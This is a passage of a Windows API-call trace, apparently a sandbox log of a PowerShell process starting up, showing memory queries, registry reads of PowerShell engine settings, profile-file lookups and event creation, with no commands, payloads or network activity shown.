lpBuffer=0x12d654*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.767] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.767] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.767] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.768] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.768] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.768] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.768] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.768] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.768] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.768] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.768] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.768] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.768] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.769] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.769] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.769] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.769] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.769] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.769] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.769] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.769] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.769] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.770] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.770] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.770] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.770] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.770] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.770] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.770] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dd9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.801] GetLastError () returned 0xcb [0155.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dd4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.801] GetLastError () returned 0xcb [0155.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dd4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.801] GetLastError () returned 0xcb [0155.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dd4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.801] GetLastError () returned 0xcb [0155.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dd9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.816] GetLastError () returned 0xcb [0155.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dd4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.816] GetLastError () returned 0xcb [0155.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dd4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.816] GetLastError () returned 0xcb [0155.816] VirtualQuery (in: lpAddress=0x12d2c8, lpBuffer=0x12e2c8, dwLength=0x1c | out: lpBuffer=0x12e2c8*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dd9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.817] GetLastError () returned 0xcb [0155.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dd4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.817] GetLastError () returned 0xcb [0155.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dd4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0155.817] GetLastError () returned 0xcb [0155.817] VirtualQuery (in: lpAddress=0x12d2c0, lpBuffer=0x12e2c0, dwLength=0x1c | out: lpBuffer=0x12e2c0*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.817] VirtualQuery (in: lpAddress=0x12cf74, lpBuffer=0x12df74, dwLength=0x1c | out: lpBuffer=0x12df74*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.817] VirtualQuery (in: lpAddress=0x12cf74, lpBuffer=0x12df74, dwLength=0x1c | out: lpBuffer=0x12df74*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.818] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e9fc | out: phkResult=0x12e9fc*=0x1ec) returned 0x0 [0155.818] RegQueryValueExW (in: hKey=0x1ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12ea44, lpData=0x0, lpcbData=0x12ea40*=0x0 | out: lpType=0x12ea44*=0x1, lpData=0x0, lpcbData=0x12ea40*=0x56) returned 0x0 [0155.818] RegQueryValueExW (in: hKey=0x1ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12ea44, lpData=0x509ca8, lpcbData=0x12ea40*=0x56 | out: lpType=0x12ea44*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x12ea40*=0x56) returned 0x0 [0155.819] RegCloseKey (hKey=0x1ec) returned 0x0 [0155.819] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e9fc | out: phkResult=0x12e9fc*=0x1ec) returned 0x0 [0155.819] RegQueryValueExW (in: hKey=0x1ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12ea44, lpData=0x0, lpcbData=0x12ea40*=0x0 | out: lpType=0x12ea44*=0x1, lpData=0x0, lpcbData=0x12ea40*=0x56) returned 0x0 [0155.819] RegQueryValueExW (in: hKey=0x1ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12ea44, lpData=0x509ca8, lpcbData=0x12ea40*=0x56 | out: lpType=0x12ea44*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x12ea40*=0x56) returned 0x0 [0155.819] RegCloseKey (hKey=0x1ec) returned 0x0 [0155.822] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x509ca8 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0155.824] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12e594, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0155.824] GetLastError () returned 0x3f0 [0155.824] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x509ca8 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0155.824] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12e594, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0155.824] GetLastError () returned 0x3f0 [0155.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0155.825] GetLastError () returned 0x3f0 [0155.825] SetErrorMode (uMode=0x1) returned 0x1 [0155.825] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12eaac | out: lpFileInformation=0x12eaac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.825] GetLastError () returned 0x2 [0155.825] SetErrorMode (uMode=0x1) returned 0x1 [0155.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0155.825] GetLastError () returned 0x2 [0155.825] SetErrorMode (uMode=0x1) returned 0x1 [0155.826] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12eaac | out: lpFileInformation=0x12eaac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.826] GetLastError () returned 0x2 [0155.826] SetErrorMode (uMode=0x1) returned 0x1 [0155.826] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x39 [0155.826] GetLastError () returned 0x2 [0155.826] SetErrorMode (uMode=0x1) returned 0x1 [0155.826] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12eaac | out: lpFileInformation=0x12eaac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.839] GetLastError () returned 0x3 [0155.839] SetErrorMode (uMode=0x1) returned 0x1 [0155.839] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4e [0155.839] GetLastError () returned 0x3 [0155.839] SetErrorMode (uMode=0x1) returned 0x1 [0155.839] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12eaac | out: lpFileInformation=0x12eaac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.839] GetLastError () returned 0x3 [0155.839] SetErrorMode (uMode=0x1) returned 0x1 [0155.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0155.840] GetLastError () returned 0xcb [0155.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0155.842] GetLastError () returned 0xcb [0155.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0155.845] GetLastError () returned 0xcb [0155.846] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0155.846] GetLastError () returned 0xcb [0155.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0155.847] GetLastError () returned 0xcb [0155.890] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0155.890] GetLastError () returned 0xcb [0155.891] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1f0 [0155.891] GetLastError () returned 0x0 [0155.891] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1f4 [0155.891] GetLastError () returned 0x0 [0155.891] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ac [0155.891] GetLastError () returned 0x0 [0155.891] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b0 [0155.891] GetLastError () returned 0x0 [0155.891] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x350 [0155.891] GetLastError () returned 0x0 [0155.891] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x328 [0155.891] GetLastError () returned 0x0 [0155.891] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330 [0155.891] GetLastError () returned 0x0 [0155.891] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c [0155.891] GetLastError () returned 0x0 [0155.891] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x358 [0155.892] GetLastError () returned 0x0 [0155.892] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x35c [0155.892] GetLastError () returned 0x0 [0155.892] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x360 [0155.892] GetLastError () returned 0x0 [0155.892] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x364 [0155.892] GetLastError () returned 0x0 [0155.893] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0155.893] GetLastError () returned 0xcb [0155.900] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0155.900] GetLastError () returned 0xcb [0155.901] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x12eaec | out: lpMode=0x12eaec) returned 1 [0155.902] GetLastError () returned 0xcb [0155.903] SetEvent (hEvent=0x3b0) returned 1 [0155.903] GetLastError () returned 0xcb [0155.903] SetEvent (hEvent=0x1f0) returned 1 [0155.903] GetLastError () returned 0xcb [0155.903] SetEvent (hEvent=0x1f4) returned 1 [0155.903] GetLastError () returned 0xcb [0155.903] SetEvent (hEvent=0x3ac) returned 1 [0155.903] GetLastError () returned 0xcb [0155.903] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x368 [0155.903] GetLastError () returned 0x0 [0155.904] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0155.904] GetLastError () returned 0xcb [0155.905] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e950 | out: phkResult=0x12e950*=0x3b4) returned 0x0 [0155.905] RegQueryValueExW (in: hKey=0x3b4, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x12e998, lpData=0x0, lpcbData=0x12e994*=0x0 | out: lpType=0x12e998*=0x0, lpData=0x0, lpcbData=0x12e994*=0x0) returned 0x2 [0161.176] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x32c [0161.176] GetLastError () returned 0x0 [0161.176] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x390 [0161.176] GetLastError () returned 0x0 [0161.176] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394 [0161.176] GetLastError () returned 0x0 [0161.176] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a8 [0161.176] GetLastError () returned 0x0 [0161.176] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c8 [0161.176] GetLastError () returned 0x0 [0161.176] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3cc [0161.176] GetLastError () returned 0x0 [0161.177] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d0 [0161.177] GetLastError () returned 0x0 [0161.177] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d4 [0161.177] GetLastError () returned 0x0 [0161.177] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d8 [0161.177] GetLastError () returned 0x0 [0161.177] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3dc [0161.177] GetLastError () returned 0x0 [0161.177] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e0 [0161.177] GetLastError () returned 0x0 [0161.177] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e4 [0161.177] GetLastError () returned 0x0 [0161.177] SetEvent (hEvent=0x3a8) returned 1 [0161.177] GetLastError () returned 0x0 [0161.177] SetEvent (hEvent=0x32c) returned 1 [0161.177] GetLastError () returned 0x0 [0161.177] SetEvent (hEvent=0x390) returned 1 [0161.177] GetLastError () returned 0x0 [0161.177] SetEvent (hEvent=0x394) returned 1 [0161.177] GetLastError () returned 0x0 [0161.177] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e8 [0161.177] GetLastError () returned 0x0 [0161.177] 